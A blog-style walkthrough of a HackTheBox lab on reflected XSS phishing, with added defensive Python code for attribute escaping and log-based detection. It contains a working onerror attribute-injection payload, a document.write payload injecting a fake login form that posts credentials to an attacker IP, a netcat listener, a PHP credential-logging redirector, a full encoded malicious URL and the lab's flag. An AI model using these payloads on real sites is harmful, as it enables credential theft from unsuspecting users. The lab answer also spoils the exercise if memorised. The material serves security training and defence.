HackTheBox — XSS: Phishing

- Phishing has become increasingly popular, as it is the main way attackers scam victims.
- In this blog post, we will explore how to use XSS to perform a phishing attack.
XSS Discovery

- Let's try the <script>alert(1)</script> payload in the application.
- Nothing happens when we submit the payload. Let's try some other payloads in the URL to see whether the application is vulnerable.

- We will try using XSStrike to discover valid payloads:
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://$TARGET/phishing/index.php?url=<script>alert(1)<%2Fscript>"
- Let's try to discover the payload manually. Submit the input "Testing payload" and see where it lands in the HTML body.

- The value appears inside the src attribute of an image tag.
- Let's try the following payload:
x' onerror=alert(1) alt='testing xss
- This results in a complete image tag:
<img src='x' onerror=alert(1) alt='testing xss'>

- The application does trigger the alert. We’ve found a valid payload.
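The reflection works because the application places the url parameter inside a single-quoted src attribute without escaping it, so a quote in the input closes the attribute and the rest of the input is parsed as new attributes of the img tag. The Python snippet below is an added example, not code from the HTB lab or from this post: it models that broken pattern beside a hardened version that first checks the value is an absolute http(s) URL and then escapes it for the attribute context, and it uses the standard-library HTML parser to show which attributes a browser would actually see. The function names and the example image URL are my own; the payload string is the one found above.

```python
import html
from html.parser import HTMLParser
from typing import Dict, Optional
from urllib.parse import urlsplit

# Constructed sample input: the working payload found above, exactly as it
# would be typed into the Image URL field.
PAYLOAD = "x' onerror=alert(1) alt='testing xss"


def render_image_naive(url: str) -> str:
    """The bug pattern: the parameter is concatenated into a single-quoted
    src attribute. A quote in the input closes the attribute, and whatever
    follows is parsed as further attributes of the <img> tag."""
    return f"<img src='{url}'>"


def is_safe_image_url(url: str) -> bool:
    """Accept only absolute http(s) URLs. javascript:, data:, relative paths
    and scheme-less junk are rejected outright rather than escaped."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_image_hardened(url: str) -> Optional[str]:
    """Validate first, then escape for the attribute context. html.escape with
    quote=True converts both ' and " to entities, so the attribute can no
    longer be closed early. Returns None when the URL is rejected."""
    if not is_safe_image_url(url):
        return None
    return f'<img src="{html.escape(url, quote=True)}" alt="">'


class _ImgAttrs(HTMLParser):
    """Collects the attributes a parser would see on the <img> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: Dict[str, Optional[str]] = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs = dict(attrs)


def img_attributes(markup: str) -> Dict[str, Optional[str]]:
    """Parse the rendered tag and return its attribute map; an injected
    onerror handler shows up here as a real attribute."""
    parser = _ImgAttrs()
    parser.feed(markup)
    return parser.attrs


if __name__ == "__main__":
    print(render_image_naive(PAYLOAD))       # attribute injection succeeds
    print(img_attributes(render_image_naive(PAYLOAD)))
    print(render_image_hardened(PAYLOAD))    # None: rejected by validation
    print(render_image_hardened("https://example.com/a'b.png"))  # quote escaped
```

Validation and escaping do different jobs: escaping alone would still let a `javascript:` URL through as a syntactically clean src value, and validation alone would still break the attribute on a legitimate URL containing a quote, so the hardened version does both.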
Login Form Injection
- Now that we have identified a valid payload, we can inject a login form into the target page so that it submits the credentials back to our server.
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>
- To inject this form, we use the document.write() function, so the payload looks like:
document.write('<h3>Please login to continue</h3><form action=http://10.10.15.119:5555><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
- Replace alert(1) in x' onerror=alert(1) alt='testing xss with the document.write() payload, and put the result in the URL.
- Set up a Netcat listener:
nc -lnvp 5555
- Once the login form is injected, submit some random credentials. We should get a connection back to our server.

- As seen in the screenshot, not only did we get a connection back to our server, but we also obtained the login credentials (test:pass).
- In theory, this is how we steal credentials from users. However, the victim may get a "site can't be reached" error, which will raise suspicion.
- Hence, it is better to log users' credentials and return them to the original page without any visible injection. The index.php on our server should look like this:
<?php
// Placeholder: replace with the vulnerable host's address. The shell-style
// $TARGET from earlier is not expanded by PHP, so it is set explicitly here.
$target = "TARGET_IP";

// Append any submitted credentials to a file, then send the user straight
// back to the real page so nothing looks broken.
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    fclose($file);
    header("Location: http://$target/phishing/index.php");
    exit();
}
?>
- Store index.php in /tmp/tmpservers on the attacker server.
- Start a PHP listener:
sudo php -S 0.0.0.0:8080
- In the payload above, remember to change the listening port to match. Submit the login form and we should receive the user's credentials.

- On the front end, the user is returned to the /phishing/index.php page.
Answer the question
Try to find a working XSS payload for the Image URL form found at ‘/phishing’ in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit ‘/phishing/send.php’ to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim’s login credentials, which you can use to login to ‘/phishing/login.php’ and obtain the flag.
- Repeat the above steps. Once we have confirmed that the credentials are retrieved, copy the whole URL and paste it into the URL field of send.php:
http://10.129.56.135/phishing/index.php?url=x%27+onerror%3Ddocument.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.160%3A8080%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29+alt%3D%27testing+xss
- We should get the credentials in our terminal.

- Log in with the credentials and we should get the flag.
Answer: HTB{r3f13c73d_cr3d5_84ck_2_m3}
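From the defender's side, a URL like the one above is fully visible in the web server's access log, because the whole payload travels in the url query parameter. The Python scanner below is an added example, not part of the original post: it decodes that parameter from constructed combined-format log lines and flags values containing event-handler attributes, document.write calls, or injected form or script tags, checking a second decode as well so double-encoding does not hide the markers. The log lines, function names and indicator list are my own; 10.10.15.160 is the attacker address from this writeup.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines in combined-log shape. Line 3 carries
# the same kind of injected-form URL shown in the writeup (10.10.15.160 is
# the attacker address from the post); lines 1-2 are a benign image URL and
# the bare alert() probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /phishing/index.php?url=https%3A%2F%2Fexample.com%2Fcat.png HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /phishing/index.php?url=x%27+onerror%3Dalert%281%29+alt%3D%27testing+xss HTTP/1.1" 200 530
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /phishing/index.php?url=x%27+onerror%3Ddocument.write%28%27%3Cform+action%3Dhttp%3A%2F%2F10.10.15.160%3A8080%3E%27%29+alt%3D%27x HTTP/1.1" 200 800
"""

# Request target between the quotes of the request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Markers that never belong in a value that is supposed to be an image URL.
INDICATORS = {
    "event_handler": re.compile(r"\bon\w+\s*=", re.I),
    "dom_write": re.compile(r"document\.write\s*\(", re.I),
    "injected_form": re.compile(r"<\s*form\b", re.I),
    "script_tag": re.compile(r"<\s*script\b", re.I),
}


def decode_param(request_path: str, name: str) -> Optional[str]:
    """Pull one query parameter out of the request target, percent-decoded."""
    values = parse_qs(urlsplit(request_path).query, keep_blank_values=True).get(name)
    return values[0] if values else None


def classify(value: str) -> List[str]:
    """Return the indicator labels matching the value, checked both as
    decoded and after a second decode (double-encoded payloads)."""
    candidates = (value, unquote_plus(value))
    return [label for label, pattern in INDICATORS.items()
            if any(pattern.search(c) for c in candidates)]


def scan_log(text: str, param: str = "url") -> List[Dict[str, object]]:
    """Scan access-log text and report requests whose `param` carries markup."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = decode_param(match.group(1), param)
        if value is None:
            continue
        hits = classify(value)
        if hits:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "indicators": hits,
                "value": value,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']} from {finding['client']}: "
              f"{', '.join(finding['indicators'])} -> {finding['value']!r}")
```

The injected_form and dom_write indicators are what separate a credential-phishing attempt from a plain alert() probe: the second line trips only the event-handler check, while the third trips all three, which is the kind of hit worth paging on.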
CONCLUSION
- That's it for today. This is something really new and exciting for a lot of beginners. The technical aspect may be a little overwhelming, but it is all worth it.
- Please clap if you like my post and follow me for more Cybersecurity content.